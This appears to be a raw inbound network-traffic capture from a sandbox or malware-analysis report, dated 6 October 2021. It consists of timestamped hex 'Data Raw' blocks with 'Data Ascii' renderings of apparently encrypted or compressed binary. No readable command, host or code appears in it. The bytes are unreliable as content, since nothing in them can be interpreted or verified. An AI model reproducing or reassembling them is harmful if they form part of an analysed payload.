                                                          2021-10-06 16:03:54 UTC31INData Raw: 02 28 00 1f 30 ab dc 77 84 de ab 8a 16 59 d3 a0 4e 44 70 23 a7 b7 11 e9 2e 98 60 49 9f d2 50 43 20 22 d5 32 22 c7 da b7 2e d4 44 9f 13 77 f4 cc 83 67 09 17 2d cb 20 ac d5 11 fd 7b 86 f8 f2 f3 6c a7 c2 55 54 67 d2 51 22 6d 58 a7 80 59 90 f7 09 04 09 26 7d b7 61 5f 40 df 48 c5 93 3b ce 65 60 0f 44 c7 c7 ce a5 f6 cc 94 53 c7 44 02 c9 92 f2 d0 1b 5f 98 15 7b 61 7e 07 7d 49 6c d9 b7 ee 55 84 e5 d4 02 cc 17 9e 33 b7 2a e2 ac 03 cb db 9a 40 25 fd 91 bd 20 d7 62 0f 7a f9 45 df 98 ed 5b cd 2a 4c f2 df 2d bb e6 21 71 a8 17 5d ca 10 01 0e c7 bd ff 79 a8 93 ff 00 30 ae d1 de cb 0a 65 ce 1d 93 4a f4 c4 84 a5 bf 3a f9 e1 15 88 6b 7d 0d 4f ad 9a 69 1f a2 6c d5 06 16 d1 be b8 92 30 a7 4d 7d 23 3c 72 be 84 6f e1 bb a4 79 b1 5b 0b fa f9 30 ef 9b a4 d7 ab a6 79 e9 39 e7 85
                                                          Data Ascii: (0wYNDp#.`IPC "2".Dwg- {lUTgQ"mXY&}a_@H;e`DSD_{a~}IlU3*@% bzE[*L-!q]y0eJ:k}Oil0M}#<roy[0y9
                                                          2021-10-06 16:03:54 UTC32INData Raw: 43 b6 8a 20 83 5f 1c 81 43 14 bb 24 30 0a 46 52 f1 61 d0 76 fd 15 f5 07 5c 04 e3 6f 4b e4 ce d3 de b3 5a 6f 67 61 67 6e 99 0a ee a2 6e d9 08 e5 83 f5 81 6f 5d 79 a0 85 77 c4 58 43 86 e7 3a 1a 15 79 ab 5a 7a cc 35 e6 af ae 9a 7e d8 f2 65 ff 90 ba eb 13 b2 5c 7d 2c 37 0f 37 8b a7 cf 49 b3 34 d8 e3 fa 47 6c 94 05 cc 76 e7 15 fc 74 1f b8 30 d3 ef 15 4a f7 3a 07 5d 69 51 ab f1 99 e4 9e 4f 13 c6 9e 9f 1c 91 30 78 53 66 4d 57 f7 d3 59 a9 d4 8c 4a d0 d7 2f ba 44 5f 3b fd 59 31 1d 16 69 e4 e2 75 72 6f 26 ad 17 08 a7 ae 41 1c a0 63 f9 4c 3f 48 5e 98 76 c8 e1 e7 b6 f7 33 69 2e 71 3f b6 67 7f e8 d8 90 c1 17 ec c3 f7 de f0 ea 2c 4d 36 f2 a8 69 04 f2 b1 7f 04 51 6a 9a fc cf e8 54 5b 65 95 e5 88 94 0d f2 63 20 5d a5 e4 26 9d 52 58 4b e3 3a d6 fd 2b 75 97 b5 5b 02 9f 0e
                                                          Data Ascii: C _C$0FRav\oKZogagnno]ywXC:yZz5~e\},77I4Glvt0J:]iQO0xSfMWYJ/D_;Y1iuro&AcL?H^v3i.q?g,M6iQjT[ec ]&RXK:+u[
                                                          2021-10-06 16:03:54 UTC33INData Raw: cc 25 e7 0c 92 52 6c 41 99 2d ae 4d 23 10 80 11 48 9f e2 af 66 01 03 d9 11 73 9f c9 c0 48 c4 92 13 38 d1 fc 0c 79 4b f8 ce b6 c7 e1 3f da c7 4e 2a db 92 f2 cb 24 1e 15 3e 71 63 10 8c 79 56 75 c7 b1 60 f3 ab 06 2a 03 e0 2a 84 17 80 b9 db 75 8d 63 25 87 59 50 d5 17 b2 39 23 60 4c e8 fb 6d 95 95 e5 df 71 10 a0 fd df 3c 85 f2 1f ae aa 3b 56 a8 4b 18 9e f4 0b 1a 8f d9 3b 3e 1b b1 19 16 c6 0e 04 4d 42 1a bf 5b f8 da aa 32 aa a6 f9 e1 91 01 dc c9 90 55 b5 8d 7f 00 3d d1 e7 8a 3f c0 b4 be 80 9b 38 f4 bf 3f a5 d3 22 b0 67 f7 b7 a2 6a 2c e3 dd e3 78 98 c9 73 a4 fb af b1 59 e1 a1 e7 87 b6 53 4e 05 ae 74 65 96 fd 6b 34 2e fc 81 1e af c4 a6 03 12 66 65 f4 44 bc 5c 2c 0a 01 d6 b1 b9 40 d1 80 d4 3f ba a5 69 ad 5b 6f 30 ce a0 84 9b c5 33 08 e8 07 a2 e8 f3 a2 f9 d8 bb 84
                                                          Data Ascii: %RlA-M#HfsH8yK?N*$>qcyVu`**uc%YP9#`Lmq<;VK;>MB[2U=?8?"gj,xsYSNtek4.feD\,@?i[o03
                                                          2021-10-06 16:03:54 UTC34INData Raw: dc 35 bc a8 e2 5d c5 5b 42 71 6b 6e 9e ad 6b 10 57 1e 2c 28 25 2c 21 c8 f4 47 2f 37 60 48 30 96 43 3d e7 bb 1d 26 f1 5c 7f 8c 34 dd 19 fb b5 3e 2c 75 d9 76 28 47 57 1e 23 a6 1b 75 8d d9 ac 82 87 f9 42 08 62 4b 6b 01 8e 2e 39 fe 3d 9d 7b 5f 9e ce 46 54 07 42 c5 3d 35 34 f3 0c 23 c5 45 80 e6 c7 e5 cc 89 7e 06 18 38 d5 24 ab cb 0a 7e 32 e8 7d ff e2 6a a0 54 68 57 9d a3 19 52 ca 4b a8 8a 60 c4 e9 1b f0 20 27 54 a6 62 43 e4 d2 4b c5 94 3b 42 65 60 0f 3c d3 f8 ce af e4 e3 2e 55 d6 49 3c 82 95 7c 6d 63 20 15 3e 71 70 79 7b 04 56 7f c0 ac fd 4d 9a f1 45 51 e0 1b 85 2c a8 ab d2 1c aa 34 24 8d 40 25 ec 8f c1 6c 29 63 29 63 f6 7c 92 f6 bb 51 c6 3a 4c f3 01 0e 91 d1 00 8f a9 31 43 cb 0d 10 b2 f4 60 0a e9 af 8c e8 19 2b bd c9 f9 ec 13 9b c5 ef aa 4f ea d8 70 fa b2 1f
                                                          Data Ascii: 5][BqknkW,(%,!G/7`H0C=&\4>,uv(GW#uBbKk.9={_FTB=54#E~8$~2}jThWRK` 'TbCK;Be`<.UI<|mc >qpy{VMEQ,4$@%l)c)c|Q:L1C`+Op
                                                          2021-10-06 16:03:54 UTC35INData Raw: 51 cb 30 c6 d2 6e 36 fc 04 6d e0 d7 20 df bf e1 7c 4f 94 41 be 3a 3b de 5d f7 c2 57 6f ae 2d 09 f2 d5 f8 98 67 1d 89 1c cb 05 03 bf 37 39 d9 32 8b 04 22 51 01 2f 91 42 ba 5c 0a 80 29 a9 f1 33 ec 31 61 19 f9 55 aa 8f 71 cc e2 2d 56 04 d6 7c 4e c8 c8 bc f9 f1 5a 65 67 72 73 2a 9f 0b e6 bf 81 dd 3c 88 b1 f8 81 6d 46 af c7 a8 7a b0 7c 47 97 e6 26 7a 15 79 ab 42 64 d1 32 ff bd 46 8a 56 54 52 06 d3 99 a3 1f 19 40 44 47 2b 73 a4 31 89 c2 8a 27 d6 3f f2 e9 26 99 75 ad 2b ca 2a 88 42 fc 30 15 64 29 c2 8c 29 06 f7 38 34 a3 69 61 af e8 b1 fe d9 4f 01 b9 60 90 30 9c 37 17 1c 67 43 5d 88 95 6d b4 fe 97 46 d0 c4 08 40 45 f2 39 e5 55 7c 15 0e 86 f1 c5 0a 11 7c 27 8f 55 7a c5 a5 6c cf b4 66 f1 40 46 2e 5f b4 7e b0 cf e6 be e6 de 6e 71 55 15 b4 46 dd f7 e3 95 d0 11 98 d4
                                                          Data Ascii: Q0n6m |OA:;]Wo-g792"Q/B\)31aUq-V|NZegrs*<mFz|G&zyBd2FVTR@DG+s1'?&u+*B0d))84iaO`07gC]mF@E9U||'Uzlf@F._~nqUF
                                                          2021-10-06 16:03:54 UTC36INData Raw: de ab 82 11 b0 2c 8d 65 48 77 1a f4 34 2a ff 2e 89 6d 47 65 cc 64 56 26 0e f9 23 2c 3e db 8a 24 da 45 77 88 73 f3 c4 a3 6c 03 09 3e ec 30 bc da 04 d8 f5 86 d4 f5 cf fa ae 59 7f 46 99 3c a9 2b 9d 4a 84 83 5f 8c ef 1b eb 0f 15 58 58 65 69 ce cb 4d fd f8 ed 9a 9a 1e 77 52 4b f2 e6 d0 f6 e4 35 50 c3 4b 02 05 92 f2 dc 26 89 15 3e 60 51 7a 14 1e 56 7f ca e8 ee 44 9a ef 20 01 ff 16 8d 44 f5 ba db 77 d6 15 24 87 59 45 8b 81 b2 33 3f f9 0b 07 fa 6d 95 95 ff 53 ee 48 5e fd d5 14 a4 f8 37 85 bf 13 c5 db 1c 1f b6 ee 70 03 8c 2a d9 e8 13 3b ac bb 84 d4 13 9f b1 43 be 5b f3 f8 d5 25 bd 30 d3 f4 46 96 6d 6a da 56 a5 94 6d 38 1f b8 c1 b9 16 f7 be b8 92 99 9e 7b 69 37 21 ba 96 06 6f e0 a1 bb 63 a2 54 0b eb ae 77 e1 6b bf fb a5 b6 d9 fd d8 9a 94 86 5e 30 41 ae 74 6f f7 8d
                                                          Data Ascii: ,eHw4*.mGedV&#,>$Ewsl>0YF<+J_XXeiMwRK5PK&>`QzVD Dw$YE3?mSH^7p*;C[%0FmjVm8{i7!ocTwk^0Ato
                                                          2021-10-06 16:03:54 UTC38INData Raw: 3b fd 35 ee 31 5e 19 f9 55 b4 80 2a c5 e3 2d 56 3a d1 46 02 d0 e6 60 de f0 5c 7c 72 66 6f cb 01 1c d7 8f 81 dc 37 ee 8d ea 89 4c 6c 96 a8 b8 72 20 7c 45 97 e5 4e 79 30 79 a1 5b 70 c5 24 eb 91 61 9b 52 d0 c9 60 ee 9d ab 1c 3a 2f 5e 56 28 0d c8 27 5f db 8b 59 bb 2f fb 6d 4d 75 b0 b6 00 e4 a2 e6 15 f6 1d 8b 66 2f d7 e4 c0 11 e3 32 1e b8 07 2a af e8 b9 22 b8 4f 1b dd 70 9e 30 9e 37 e9 1c 1a 36 5e e1 e0 6d be fe 8c 76 d5 df 0e 44 45 73 6a e5 55 20 3d b1 96 e5 c8 72 77 63 59 e6 59 09 a3 8c 42 c7 b9 69 d1 6a 2b b6 59 db b3 de ed e1 b9 97 c3 69 02 77 60 f9 4c ce f3 f8 4e cb 10 db f5 f2 b1 91 ea 2c 47 ea f4 82 69 06 de a0 55 06 3c 93 9c fc e1 ee 41 53 72 fa 1f 88 8f 37 28 6f 04 68 a5 e4 78 b5 6a 49 63 ad e7 d6 f9 4e fd a1 b4 51 d6 98 21 30 9b 03 52 5e 25 49 81 4e
                                                          Data Ascii: ;51^U*-V:F`\|rfo7Llr |ENy0y[p$aR`:/^V('_Y/mMuf/2*"Op076^mvDEsjU =rwcYYBij+Yiw`LN,GiU<ASr7(ohxjIcNQ!0R^%IN
                                                          2021-10-06 16:03:54 UTC39INData Raw: 15 e8 3c 63 4b a8 91 4d 80 e7 e5 fb 24 01 41 2b 71 45 cc e1 62 da 82 00 60 65 71 00 4c 46 06 cf 89 fc ed 2e 57 49 f9 18 f6 8d fc c9 09 89 04 3b 64 6b 81 15 55 47 77 e2 d8 ed 44 8d 96 b7 03 e0 11 a3 21 be b1 c8 76 fe 25 21 9f ad 2b d1 89 c1 85 29 63 29 7a e2 7e 9a 99 fc 54 d9 3c a1 fc f3 34 bd ee e1 82 b6 36 43 de 1c 08 9b e7 8f 02 aa 43 8a ea 3b 60 ad c0 d7 fc 37 9b cf 3b d0 97 f9 d0 a6 3e ae 3f ff e7 9d 90 62 83 0d 70 aa 9a 63 00 29 6a d0 96 2d c5 be a9 9d 8f 48 42 45 32 3d 69 88 3f 6a e1 a0 be 7c ac aa 0a c7 ff 17 7f 65 a5 fb ba b8 60 fa a3 de 91 9c a4 4f 1f bb 72 67 f7 e3 68 25 3e c7 a1 26 87 cf c9 cf 12 77 6b f4 a9 b8 70 11 09 0e 00 96 96 4e d5 b0 76 38 ba af 51 8f a3 86 e7 f5 b0 81 9d 76 31 08 3e 28 8c eb ed 13 fb cc be 95 c3 f3 71 87 c9 c1 40 7f 7e
                                                          Data Ascii: <cKM$A+qEb`eqLF.WI;dkUGwD!v%!+)c)z~T<46CC;`7;>?bpc)j-HBE2=i?j|e`Orgh%>&wkpNv8Qv1>(q@~
                                                          2021-10-06 16:03:54 UTC40INData Raw: 39 ec a6 5f 93 44 d8 6b de e0 97 79 3d 04 9f 5e 5c 5d 8b c1 30 8f db 85 57 a3 b3 d9 e3 fa 46 6c a1 0f 42 94 f6 10 72 87 c5 af fb d2 35 b3 2c f7 32 1f ae 60 75 21 5f ac ee 48 5e 1e ca 7f 8e 18 8a 36 17 14 6f 5b 54 f9 e8 e3 09 ef 92 c8 67 05 10 52 44 73 33 cd c2 31 15 04 86 e3 cd 7e 64 74 36 80 36 91 a6 a4 6a aa ae 6e f9 4e 3a b2 4e b0 5c 43 ed e7 b4 e6 13 79 27 5b 23 b4 4c c4 e1 f5 84 cb 3f cf f3 f5 d4 18 ea 2a 67 36 f2 a9 79 06 df b0 55 50 3e 16 41 fc d4 de 41 59 73 e1 2f 8c 94 3a 2c 6f 08 4a a5 e4 3d b7 46 51 49 86 2d d6 ff 4e 98 a4 b7 45 f6 bb b1 18 de 0a 7a 1f 0c f0 89 4c 6a 2c c7 87 59 a6 dc 34 26 c1 4e c9 b9 dc 5a 50 24 5d 65 d4 ee d1 f7 69 29 a2 14 85 aa 16 eb 17 22 bd 38 22 65 f5 d5 ca 50 cb 4e 6d 4b a0 84 3a 03 6a b3 ab 1e d3 5a af 8c 82 be eb 65
                                                          Data Ascii: 9_Dky=^\]0WFlBr5,2`u!_H^6o[TgRDs31~dt66jnN:N\Cy'[#L?*g6yUP>AAYs/:,oJ=FQI-NEzLj,Y4&NZP$]ei)"8"ePNmK:jZe
                                                          2021-10-06 16:03:54 UTC41INData Raw: bf 02 e0 11 a3 31 71 f3 db 73 fc 1c 30 87 53 20 ee 87 99 35 f9 29 23 70 f9 45 8b 99 ed 5b d5 37 49 ee d7 42 c6 f8 37 85 ba 32 46 c9 14 0b 97 d6 12 03 86 51 00 d7 13 3f af d3 d7 c5 15 b3 95 31 bf 51 ef fe ab 22 b6 e7 6f f2 98 8f 7a 74 00 2f 35 8a 67 03 a0 6c de 96 2c e9 96 d7 9b 92 b0 6b fe 36 2b 6e 87 05 47 91 b2 bb 65 cd cc 0a eb fc 3e eb 77 8c d3 d4 b4 73 f9 8b 58 95 86 50 5f 1a 87 06 66 df fb 04 bd 39 ef 8f 37 8d d7 8f 2b 61 74 61 e9 92 2a 71 00 06 04 d7 bf ce 43 d7 9e 36 a0 bb a5 62 b7 56 6b 31 c1 d6 87 9d 61 1c 88 c1 29 aa f9 dc 28 88 cf af 96 b0 95 71 ab c8 d2 62 e7 56 13 96 3a 99 c4 fa f8 18 aa cb 44 bd c8 2f 9a ca 01 33 b2 c4 dd f5 de f8 e1 b3 d8 f6 64 26 59 a4 ab d9 ec dd f6 54 a1 b9 f4 54 1f 53 11 49 e7 8b d1 d1 52 85 1a 64 29 4d a2 5f 57 65 54
                                                          Data Ascii: 1qs0S 5)#pE[7IB72FQ?1Q"ozt/5gl,k6+nGe>wsXP_f97+ata*qC6bVk1a)(qbV:D/3d&YTTSIRd)M_WeT
                                                          2021-10-06 16:03:54 UTC43INData Raw: 60 88 33 9c 37 77 1e 67 5c 4b fc ea 55 b8 fd 97 46 d0 ce 32 5b 52 8d 38 c9 5c 09 e8 0c 97 e5 d1 61 63 77 27 94 53 15 59 a5 40 86 a8 6b d1 1e 29 b6 55 f1 79 df ed e7 ca ec cd 68 e8 72 14 b4 bb ce f2 f2 4d c1 17 f7 7e f4 de c6 c8 2c 4d 36 4b a8 69 06 6e b1 55 06 b0 93 9a fc 4b c4 41 59 fc fa 1f 88 1a 07 2c 6f 82 68 a5 e4 31 a6 60 58 5a e3 fb cd 01 45 a2 9a a4 59 af 30 27 18 d4 13 55 47 11 e3 89 4e 14 be d8 91 ad b3 e6 07 b2 10 f2 c3 d6 ca 73 44 2e 57 b1 f2 b2 e7 f7 63 0b a7 1e ad 98 05 ee 02 eb ae 34 08 74 ff ce 35 41 e7 5a 62 4b 86 1d 24 2e 60 a2 a1 74 05 73 bf bd 81 b4 b6 78 61 27 96 eb 56 b7 9b 46 3e 95 27 a1 7a 35 7c 5c b8 d7 26 bc b9 f9 38 42 50 bc 7a 54 74 89 83 de 1a 41 05 ab 8d 92 43 89 db f1 52 32 30 05 8f 21 9c 56 0e b7 64 27 30 f1 3a 41 93 2b cf
                                                          Data Ascii: `37wg\KUF2[R8\acw'SY@k)UyhrM~,M6KinUKAY,oh1`XZEY0'UGNsD.Wc4t5AZbK$.`tsxa'VF>'z5|\&8BPzTtACR20!Vd'0:A+
                                                          2021-10-06 16:03:54 UTC44INData Raw: 9b ac 31 bf 4a e6 cc 84 9f bd 3a f5 de 16 8c 6b 7b 24 78 a3 8b 6d 04 ba 4e 76 9c 3e c6 b5 cb 22 92 b6 49 63 30 44 b7 96 2c 65 f2 be ad 70 ac 6c 46 ea f6 2f f0 6a b4 f5 3f a4 77 ee a7 e7 a5 86 5a 44 1e aa 4c 57 de fd 6b 34 3c 9c 08 27 87 c3 b5 04 cc 65 44 c7 8d bd 70 0a 1f 1d d6 af ba 40 dd 45 4c 39 ba a5 79 a1 74 15 1b e9 a5 eb 1a 66 34 19 ed 2c 98 ea f4 00 fe dd ab b8 54 0c 70 a1 ad 4d 69 f5 75 54 6d 38 99 c8 fa d9 19 aa c7 46 91 9e c4 99 ca 0d 4f 2c d3 cc f8 a0 7a f2 9a f6 98 bd 35 4f 9f 35 e0 2b d7 e7 7d 98 c4 e6 5d 31 5d 8a 48 e1 ee 4a da 40 aa 21 15 3b 4a b5 7e e8 06 57 5c 79 e3 39 6d 30 90 58 78 26 6d 2c ad 67 ef 39 57 c2 c9 30 f2 c4 5c 40 fc 0a 67 f6 29 21 bd 93 ca 6d 10 d0 60 9c 7d 3a de 57 fd f5 42 66 01 4e 0a f2 9e 97 12 77 09 84 00 32 04 03 bf
                                                          Data Ascii: 1J:k{$xmNv>"Ic0D,eplF/j?wZDLWk4<'eDp@EL9ytf4,TpMiuTm8FO,z5O5+}]1]HJ@!;J~W\y9m0Xx&m,g9W0\@g)!m`}:WBfNw2
                                                          2021-10-06 16:03:54 UTC45INData Raw: 05 bc 32 5d f2 f2 9a d7 3f d9 f3 f5 d4 d0 14 2d 2d 1a d7 b9 6e 2a fe 98 12 07 3e 99 8b f5 d4 c8 69 3a 71 fa 19 e7 1e 06 2c 69 67 f2 a5 e4 26 a4 6d 70 fc e9 e4 d0 ec 4c 9f 91 9d de dd 93 2c 35 9d 11 58 70 82 f1 83 44 28 8e d6 8f 7f 84 b9 3e b6 c0 48 d0 db da 56 41 28 38 93 d8 c6 e0 e6 64 32 bc 71 89 90 16 ed 0c f1 ac 36 67 43 f7 d5 cd 51 c6 66 52 48 ae 82 4a 04 68 bd b7 18 c2 56 d3 a4 80 be b6 4c 5c 2f 96 fc 4f a0 4f b7 1a 91 19 99 30 3d 6f 52 8f e4 35 b6 b3 36 32 4c 57 55 ad 6b 69 9e a7 6b 08 7f f3 d9 59 6d 52 99 df 22 5e 2f 32 1e 9e 22 18 fe 2f 2f 9b f4 c8 e3 03 44 8c 34 dd 29 f7 a4 2a 59 d0 d9 7d 80 28 12 04 23 ac c6 64 8b f3 bb 42 fd 4f 22 bb 62 4b 60 3a 8f 2b 39 66 2e 98 6a 6f 9b cd 59 46 3c 26 fc b2 3f 39 db 9b 32 c1 56 77 88 73 ee da 81 e3 b5 1e e4
                                                          Data Ascii: 2]?--n*>i:q,ig&mpL,5XpD(>HVA(8d2q6gCQfRHJhVL\/OO0=oR562LWUkikYmR"^/2"//D4)*Y}(#dBO"bK`:+9f.joYF<&?92Vws
                                                          2021-10-06 16:03:54 UTC47INData Raw: cd 94 80 51 66 0b af 74 6f 01 fd 6c 0f 39 ff 85 26 87 c5 a0 03 e1 8e 61 fa a0 bd 70 01 17 25 fd 97 e6 40 d7 98 07 38 ba b4 1b 1c 5c 79 12 e3 a5 fa b1 66 34 1b e8 3e a2 e8 f3 28 ad cf af 96 f7 15 72 ab c4 ac ae f5 7f 31 3f 37 bc ea e5 6f 19 a0 cd 7d ac e0 57 93 14 07 5a 54 e9 dc ff cb da e4 98 f0 89 4f 75 5c 8c 3a f0 f5 d5 e7 7b e6 05 f7 54 13 e2 87 6d cf b6 c0 db 4a a1 1a 27 2a 4d ae a9 c0 62 7e 5d 63 8c b3 6c 30 90 4b 6f 15 6b 36 49 66 fe 3e 29 51 f9 30 e4 9e 74 60 e6 0a 6d e1 cc 10 de bf b3 7c 15 fc 1f b4 3a 2a ad e7 ec f2 59 65 2f 53 26 f3 98 fc b0 61 0b 82 69 82 5d 00 b5 3d 62 a3 31 8b 08 40 9e 09 27 9f f3 a3 78 22 bd 46 31 fb 3f ce 66 43 18 f3 81 b9 8f 7c c5 e2 2d 58 3f c4 6f 4b df e6 8a dd f0 5c 47 6f 75 6b 43 d9 cc e6 b5 9a 06 2a c2 b3 ce 81 67 4f
                                                          Data Ascii: Qftol9&ap%@8\yf4>(r1?7o}WZTOu\:{TmJ'*Mb~]cl0Kok6If>)Q0t`m|:*Ye/S&ai]=b1@'x"F1?fC|-X?oK\GoukC*gO
                                                          2021-10-06 16:03:54 UTC48INData Raw: fc af 19 de 06 41 52 1c f9 ab c1 04 b4 cd aa 1b a3 c1 34 3b c1 4e c9 fb f4 4a 5a 06 d8 ba da cc cb c1 1a 01 b4 1e ab 81 1a fa 11 ed b4 51 20 67 f5 d3 da 4c da 45 02 6f ac 84 23 3f 66 ac bb 71 f5 59 bc ba 90 b2 94 c8 71 2d 90 95 76 aa 91 be 39 a8 22 f6 28 36 7c 56 79 d3 10 9e 8e e8 32 57 48 4f 53 40 65 8f a1 a4 1b 50 07 30 70 81 4b 99 c0 e5 5b 00 48 f0 70 cf be e4 13 49 63 78 b3 e4 29 4e 84 1c 82 36 f7 a2 02 c2 4e d9 7c 01 b4 00 1e 29 84 52 64 8b d4 d5 30 08 4e 27 ce e5 4a 61 23 a8 42 b1 f9 2e 92 05 d3 9a cd 42 43 2a 0a 6a 3e 3f 3f a8 1f 22 c5 45 81 98 5a cd 57 83 6d 08 21 91 c7 20 bb f2 95 f0 85 8d fc 63 e2 60 bb 7a f9 41 99 27 c1 88 62 4b a2 ef cf 9e e8 11 ed 67 82 56 a6 6e 2a 45 e1 48 cf 81 17 6d 74 65 2d c8 4b f8 c4 8d 5d e7 3f 55 ef d5 2a 93 98 da 46
                                                          Data Ascii: AR4;NJZQ gLEo#?fqYq-v9"(6|Vy2WHOS@eP0pK[HpIcx)N6N|)Rd0N'Ja#B.BC*j>??"EZWm! c`zA'bKgVn*EHmte-K]?U*F
                                                          2021-10-06 16:03:54 UTC49INData Raw: af 96 ce 19 58 17 c1 c3 6e 9a 55 39 e1 3f 88 c6 c3 7b 76 b2 c0 55 9e f2 4f b1 0c 06 5c 20 e8 44 21 c1 e0 eb 64 e6 91 67 26 44 e3 6b d8 ec dd 3b 6c 8d e9 f7 54 18 14 89 48 e5 81 3c db ed 05 33 11 2a 4d a4 77 c2 64 8d 5d dc f0 b1 62 30 96 4b 73 35 6b a1 51 1e ef 3c 27 51 c9 30 f8 c9 44 64 fc 42 6c e0 d7 4a dd bf fe 63 05 71 6a b4 3a 3a cd 5b fd f4 45 79 b5 3c 0f e5 8e 64 89 70 11 94 f3 bb 02 1a a3 a7 5b bd 29 9d 92 3e 5e 12 31 09 3c ab 41 1c 16 57 37 ec 25 7a 4f 45 06 ef c3 a8 8f 1d e3 f5 b1 4d 11 cc 67 5d 45 df d5 c1 fb 4c f3 67 71 74 49 a0 96 f7 b3 8f d5 32 7b 8a ff 9e 69 53 1b b0 af 65 b5 79 df 97 e5 42 22 39 78 a1 5b 6e c9 22 81 93 51 9b 58 d3 f2 06 d6 99 a3 1f 1b 9d 59 39 e9 1d c0 3a 85 e0 14 48 b3 34 fa f7 d2 fa 7c a4 01 d5 ae e0 15 fc 31 0c bf 30 c2
                                                          Data Ascii: XnU9?{vUO\ D!dg&Dk;lTH<3*Mwd]b0Ks5kQ<'Q0DdBlJcqj::[Ey<dp[)>^1<AW7%zOEMg]ELgqtI2{iSeyB"9x[n"QXY9:H4|10
                                                          2021-10-06 16:03:54 UTC50INData Raw: bb 12 e6 f4 98 89 04 bb 0c 5c a9 55 69 2c 9b 51 cf 9c 34 cd 96 80 98 92 bc 9d 69 31 01 65 8a 2c 6f e1 b1 bd 63 be 76 0b e5 ec 2f e1 64 a5 fb 95 b7 6f b3 a3 c1 8e 86 5a 4f 28 9f 7d 65 3b ff 6b 25 54 ef 85 37 f4 7f a6 03 18 7d 1f 7c ba bd 7a 0c 72 86 fe 97 b0 53 d2 e6 77 39 ba a1 40 b1 5e 79 1e e4 aa ac 5d 64 34 19 e8 b2 a0 e8 ff 28 62 cc af 9a cc 09 61 af ea f2 68 f5 75 16 e6 3f 92 1f 70 6d 19 aa d0 51 bc 75 57 99 c0 14 54 3b cd f5 3e cc f2 f5 b2 3a 8e 67 2c 77 47 3d d8 e6 b8 2b 7c 89 c9 e4 52 10 14 15 48 e7 8b e8 cd 42 ac 34 0c 2d 5c a3 5a c7 62 5f 81 16 8e b3 6c 26 87 4d 64 ed 78 2a 40 6d c6 06 2b 51 c9 21 f0 fa b6 6d fc 0c 45 21 d4 20 db ae e4 54 e8 fc 41 b2 2d b6 81 5d ec f3 40 7c 38 3e 1f ed 95 65 89 65 66 cb 6e aa 0e 10 b9 2a 46 ad a9 87 1f 23 4f 93
                                                          Data Ascii: \Ui,Q4i1e,ocv/doZO(}e;k%T7}|zrSw9@^y]d4(bahu?pmQuWT;>:g,wG=+|RHB4-\Zb_l&Mdx*@m+Q!mE! TA-]@|8>eefn*F#O
                                                          2021-10-06 16:03:54 UTC51INData Raw: 82 c8 f5 de c7 85 7b 4d 36 f8 74 b7 13 fa 98 62 06 3e 99 89 f1 b6 7e 41 59 78 f1 37 b0 94 07 26 b1 0a 6c 8f e3 06 b5 6a 58 0a dd e4 d6 fd 44 8e 97 ec 51 dc 93 45 19 de 00 ee 59 0d f0 95 4e 05 b4 c7 87 53 b2 ca 1c b4 c0 48 c3 d6 cb 95 51 2e 57 6f db c6 e6 e2 69 23 b6 04 ad 92 17 f8 2d f9 bd 3f 09 65 f5 bb cb 40 da 58 7e 4e 96 76 25 2e 6a bd a0 1b c9 a5 bd 90 8e a8 be 0b bb 2d 96 f0 4b 72 82 bc 32 a2 3d 9c 30 26 79 43 ad 22 34 9a b1 e1 28 8b 56 5d 70 6b 60 8f ba 7f 00 bf 0e 0b a3 b9 14 94 db f1 4d 2f 26 10 86 ce 97 65 18 4f 72 dd 3d fa 23 57 89 34 cd 30 e9 5a 2b 75 7c d1 74 20 32 6f f1 23 ac cd 7b 9b f6 95 84 09 44 2e a7 75 24 8e 29 bf 27 11 2d 2f 98 60 3b b3 1e 49 50 25 0a 10 3c 3f 33 f3 bf 23 c5 45 85 96 56 f6 c9 83 7c 07 16 35 3a 21 91 d3 07 e1 81 b6 cd
                                                          Data Ascii: {M6tb>~AYx7&ljXDQEYNSHQ.Woi#-?e@X~Nv%.j-Kr2=0&yC"4(V]pk`M/&eOr=#W40Z+u|t 2o#{D.u$)'-/`;IP%<?3#EV|5:!
                                                          2021-10-06 16:03:54 UTC52INData Raw: 01 e9 4e 0d 0f ef 85 2c 94 c1 a0 08 3a 4f 61 ef b0 60 79 01 0c 15 80 ab ba 40 dd b0 81 3b ba a3 7f c9 61 79 18 e3 af 8c f2 d6 35 1f ca 24 a9 fb fb 16 ed c1 97 52 df 0d 70 ba cc d2 65 6f 6c 3e 9f 05 99 c2 d8 47 c0 a9 c1 53 85 e5 7f bd ca 07 56 3d aa e0 ff cf f8 e0 9c d8 9b 66 26 55 9d 3a f0 36 d4 e7 7b e6 71 f6 54 13 48 9b 48 e7 9a af cc 41 ac 38 0c 21 5c a2 5f 1b 67 54 5a 10 3e b2 6c 3a e2 59 73 37 70 2b 54 77 f8 17 f5 52 c9 36 97 60 75 6e f6 7e 7f e0 d7 3b ce b7 fd 74 04 f4 cf 03 2d e1 f6 5b ec f2 78 7e 2e 3c 01 da 78 f8 98 70 1a 8b 1c 88 06 03 b3 28 40 aa 39 9a 0b 07 86 09 27 93 42 85 5f 0a 8c 57 3b e0 38 89 7a 41 18 ff 4e b3 98 0b 85 c5 2f 5c 11 c2 67 63 04 cd d3 d8 9f 70 6d 76 71 b5 49 9e 3d e6 b5 9a f0 1c e7 9b f3 5f 67 54 8a b6 7f 69 b7 7e 4e 97 ed
                                                          Data Ascii: N,:Oa`y@;ay5$Rpeol>GSV=f&U:6{qTHHA8!\_gTZ>l:Ys7p+TwR6`un~;t-[x~.<xp(@9'B_W;8zAN/\gcpmvqI=_gTi~N
                                                          2021-10-06 16:03:54 UTC54INData Raw: 1e 4e 05 be eb a2 42 b4 db 19 9c 2c 4d c3 d0 de 4d 78 6a 56 bb d0 d1 7c df 82 20 b6 18 b8 84 3e af 1c fc b7 28 92 0a d3 d7 cb 46 da 48 45 a6 ad 84 23 41 40 bf b1 18 d5 4a ba d3 99 bf bc 6e 63 27 f9 3d 5c a8 9b 82 f4 47 d1 66 ee 21 6d 56 d2 e7 35 b6 b8 c4 3e 4c 51 37 40 78 65 8e c4 2d 1b 41 05 fb b7 9a 54 5e db fc 5c 36 32 06 01 87 a9 33 ee b6 9a d5 22 c0 01 73 8c 34 d6 26 f0 d7 90 59 4e d3 7d 01 10 00 1e 29 72 c5 62 a1 d9 90 85 09 0f 19 a1 62 49 61 29 bf 7b 39 f8 2e d2 6b 5a 9b 6d 49 50 2f 34 c4 3d 3f 39 db 9b 23 c5 4f 89 89 59 e5 cc 83 ae 03 09 3e 0d 21 bd da 1b f0 85 87 ce ff e2 61 aa 62 69 41 f1 2c ae 3d 16 4b a8 91 3b 25 e8 1b f0 02 22 b9 a5 64 43 c0 9e 74 c5 92 19 6d 